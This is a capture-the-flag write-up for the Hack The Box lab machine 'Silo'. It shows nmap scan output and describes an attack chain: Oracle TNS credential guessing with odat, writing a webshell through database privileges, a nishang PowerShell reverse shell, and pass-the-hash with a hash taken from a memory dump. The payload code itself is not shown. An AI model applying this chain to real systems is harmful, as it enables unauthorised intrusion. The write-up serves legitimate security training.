Page cover

Silo

Summary

I really like this machine because I had the opportunity to play with the Oracle TNS DB for the first time and learn and use some new tools that helped me on the way. To start off, I will be using this database to upload a webshell on the webserver, which is going to help me get a PowerShell shell. For privilege escalation (privesc), which is the first time I find something like this in an HTB Box, I will be playing with a memory dump file to get a hash that I can use with PassTheHash to get a shell as Administrator. There is an unintended way to get the root flag before even getting a foothold; I will talk about it in Beyond Root..

Enumeration

As always, I begin with the enumeration of ports using nmap:

  nmap -p- 10.10.10.82 --min-rate 5000 -oA nmap/silo -v

Scanning 10.10.10.82 [65535 ports]
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 8080/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed Connect Scan at 06:42, 12.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.029s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
8080/tcp  open  http-proxy
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

 nmap -sCV 10.10.10.82 -oA nmap/silo_scripts -v
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp  open  http         Oracle XML DB Enterprise Edition httpd
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=XDB
|_http-title: 401 Unauthorized
|_http-server-header: Oracle XML DB/Oracle Database
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-time:
|   date: 2023-12-31T11:48:09
|_  start_date: 2023-12-31T11:18:37
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required

I always like to go for small attack vectors and clear them out so when I go for a wide one, I can be more flexible even with time. For example, web apps have big attack vectors compared to other services. So, I will start with RPC:

I can't access RPC so I will be moving on to SMB:

Same goes for the SMB server. Keeping in mind that if I get any credentials, I can retest these two services.

I went straight for the web app on port 80, where I found nothing useful except the default page of an IIS server (version 8.5). I will start fuzzing the web app to see if there is anything.

I didn't find anything, so I will move on to the next web app on port 8080. When accessing this web app, it asks immediately for login before accessing its page. I tried some default credentials, but it didn't work, so I'm leaving this web app aside until I find some creds; maybe then I can log in.

Now I went for the Oracle TNS DB. After reading about this type of database and exploring multiple attack paths, I found this article on Hacktricks (https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) useful.

First I will be enumerating the SID using a tool called odat.

XE is a valid SID.

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

Now I will try to get some valid credentials using the passwordguesser argument with odat.

Setting Sqlplus up

Since I have valid credentials, I will try to connect to the DB. I will be using sqlplus to connect to the DB, but first, I need to set it up. Following 0xdf's steps, I will need to download:

  • instantclient-basic-linux.x64-12.2.0.1.0.zip

  • instantclient-sdk-linux.x64-12.2.0.1.0.zip

  • instantclient-sqlplus-linux.x64-12.2.0.1.0.zip

unzip em in the same directory then open your terminal source file, in my case it is zsh, and add these lines:

Then you will be ready to go.

Shell as defaultapppool

The "as sysdba" let me connect with system permissions, which facilitate reading through the database and making changes to the database configuration itself. I can see my user's permissions through:

I can see that I have sys perms on the db, so I will try to write an oracle script that leads to reading files.

I successfully wrote and ran that script but I can't see the output so I will activate the serveroutput option.

then I rerun my script by just running "/"

And now I can read files. I will try to write a file to the root directory of the webapp

Going for webshell. I will use the cmd.aspx webshell at /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx but I will remove the styling lines and some unnecessary lines so it will look like this

By accessing http://10.10.10.82/givemeshell.aspx, I can run commands easily from the webshell. However, this shell isn't that much flexible, so I will go for a reverse shell. I will use /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1, rename it to shell.ps1, set up a Python HTTP server, and listen on port 9001.

From the webshell, I will run:

Privesc

Beside the user.txt file at Phineas's Desktop there is this Oracle issue.txt file.

I had trouble using the password because I didn't know that the first character was actually wrong due to an encoding issue. So, I will transfer the whole text as base64 to my host machine, then decode it to see what the actual password is.

After unzipping the file

its a memory dump file, so I will be using volatility to analyze this file but first i need a profile

Now I will use psexec from impacket to get a shell as Administrator

Beyond Root

Here, I will show how I could simply read the root.txt from the Oracle DB, which is easy. I just need to use the Oracle script I wrote to read files and specify the root.txt path.

PreviousWindows based machinesNextChallenges (coming soon)

Last updated